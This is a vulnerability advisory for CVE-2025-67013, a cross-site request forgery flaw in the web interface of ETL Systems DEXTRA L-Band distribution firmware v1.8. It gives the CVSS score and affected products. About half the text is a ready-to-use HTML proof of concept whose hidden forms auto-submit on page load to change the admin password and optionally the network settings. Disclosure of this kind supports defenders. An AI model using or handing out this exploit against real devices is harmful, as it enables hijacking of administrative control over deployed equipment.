Security Vulnerability Report
CVE-2025-67013 CVSS 6.5 MEDIUM

CVE-2025-67013

Published: 2025-12-26 16:15:44
Last Modified: 2026-01-02 16:10:39

Description

The web management interface in ETL Systems Ltd DEXTRA Series Digital L-Band Distribution System v1.8 does not implement Cross-Site Request Forgery (CSRF) protection mechanisms (no tokens, no Origin/Referer validation) on critical configuration endpoints.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:etlsystems:d0116s1ula-22454_firmware:1.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:etlsystems:d0116s1ula-22454:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:etlsystems:d0116s1uia-22474_firmware:1.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:etlsystems:d0116s1uia-22474:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:etlsystems:c0401s1ula-22418_firmware:1.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:etlsystems:c0401s1ula-22418:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:etlsystems:c0801s1ula-22420_firmware:1.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:etlsystems:c0801s1ula-22420:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:etlsystems:c1601s1ula-22422_firmware:1.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:etlsystems:c1601s1ula-22422:-:*:*:*:*:*:*:* - NOT VULNERABLE
ETL Systems DEXTRA Series Digital L-Band Distribution System v1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2025-67013 -->
<!-- Target: ETL Systems DEXTRA Series Digital L-Band Distribution System v1.8 -->
<!DOCTYPE html>
<html>
<head>
  <title>CSRF PoC - Change Admin Password</title>
</head>
<body>
  <h1>CVE-2025-67013 CSRF PoC</h1>
  <p>This PoC demonstrates CSRF vulnerability in ETL Systems DEXTRA Series.</p>

  <form id="csrfForm" action="http://TARGET_IP/admin/settings" method="POST" style="display:none;">
    <!-- Change admin password -->
    <input type="hidden" name="action" value="update_admin">
    <input type="hidden" name="username" value="admin">
    <input type="hidden" name="password" value="AttackerPassword123">
    <input type="hidden" name="confirm_password" value="AttackerPassword123">
  </form>

  <form id="networkForm" action="http://TARGET_IP/admin/network" method="POST" style="display:none;">
    <!-- Modify network configuration -->
    <input type="hidden" name="action" value="save_network">
    <input type="hidden" name="ip_address" value="192.168.1.100">
    <input type="hidden" name="subnet_mask" value="255.255.255.0">
    <input type="hidden" name="gateway" value="192.168.1.1">
  </form>

  <script>
    // Auto-submit forms when page loads
    window.onload = function() {
      // Submit admin password change request
      document.getElementById('csrfForm').submit();
      // Alternatively submit network config change
      // setTimeout(() => { document.getElementById('networkForm').submit(); }, 1000);
    };
  </script>

  <p>If you see this message, the forms were submitted.</p>
</body>
</html>
